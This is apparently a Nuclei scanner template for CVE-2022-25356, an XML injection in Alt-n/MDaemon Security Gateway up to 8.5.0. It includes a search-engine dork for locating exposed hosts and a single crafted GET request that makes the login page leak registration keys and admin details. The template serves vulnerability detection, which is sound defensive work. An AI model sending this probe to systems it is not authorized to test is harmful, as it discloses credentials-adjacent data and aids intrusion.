id: CVE-2022-25356 info: name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection author: Akincibor severity: medium description: | Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. reference: - https://www.swascan.com/security-advisory-alt-n-security-gateway/ - https://www.altn.com/Products/SecurityGateway-Email-Firewall/ - https://www.swascan.com/security-blog/ - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25356 cwe-id: CWE-91 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* epss-score: 0.00389 metadata: max-request: 1 google-query: inurl:"/SecurityGateway.dll" verified: true tags: cve,cve2022,altn,gateway,xml,injection http: - method: GET path: - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1' matchers-condition: and matchers: - type: word part: body words: - "Exception: Error while [Loading XML" - "<RegKey>" - "<IsAdmin>" condition: and - type: status status: - 200